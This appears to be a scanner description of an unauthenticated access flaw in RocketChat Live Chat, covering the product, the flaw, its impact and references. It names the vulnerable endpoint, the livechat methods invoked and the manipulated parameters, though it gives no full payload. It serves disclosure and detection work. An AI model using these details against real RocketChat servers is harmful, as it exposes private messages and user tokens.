RocketChat Unauthorized Admin Access Scanner

RocketChat Live Chat is an open-source messaging platform designed for team collaboration and communication. It is widely used by organizations for its flexibility in customization and deployment, ensuring seamless internal messaging and customer interaction. The platform offers features such as group messaging, file sharing, and integrations with other productivity tools. It is utilized in various industries including IT, education, and customer service. RocketChat is valued for its real-time chat functionality and support for both individual and team communications, enabling effective information exchange. Organizations use RocketChat to enhance communication workflow and boost team productivity.

The Unauthorized Admin Access vulnerability allows attackers to gain unauthorized access to sensitive information on the RocketChat Live Chat platform. This vulnerability arises from the acceptance of invalid parameters by the application, which can be exploited to access messages and user tokens without authentication. Unauthenticated users can potentially read sensitive messages and other user-related data. The flaw results from improper access controls and inadequate parameter validation, posing a significant risk to data confidentiality. The impact of this vulnerability can be severe, leading to information exposure and potential misuse of user data.

This vulnerability is linked to the improper handling of admin-level functions accessible through insecure endpoints. Specifically, the vulnerable endpoint `/api/v1/method.callAnon/cve_exploit` does not adequately verify user permissions, allowing arbitrary parameter injection. Attackers can exploit this by submitting crafted JSON payloads that invoke admin functionalities like `livechat:registerGuest` and `livechat:loadHistory`. These actions do not require proper authentication, thereby exposing user messages and administrative operations to unauthorized individuals. The JSON payload parameters manipulated include `token`, `name`, and `rid`, exploiting weaknesses in the application’s access control mechanisms.

If exploited, this vulnerability may allow malicious actors to access sensitive chat logs and gather user information, compromising the privacy of communications. Attackers could leverage the accessed data for further attacks, such as spear-phishing or identity theft. Unauthorized message retrieval could lead to exposure of proprietary information or private conversations, impacting organizational security. Additionally, malicious users could create unauthorized accounts and manipulate chat sessions, disrupting normal operations and trust in the platform. The broad access to sensitive data could have catastrophic repercussions for victim organizations and their clients.

REFERENCES

• https://docs.rocket.chat/guides/security/security-updates
• https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages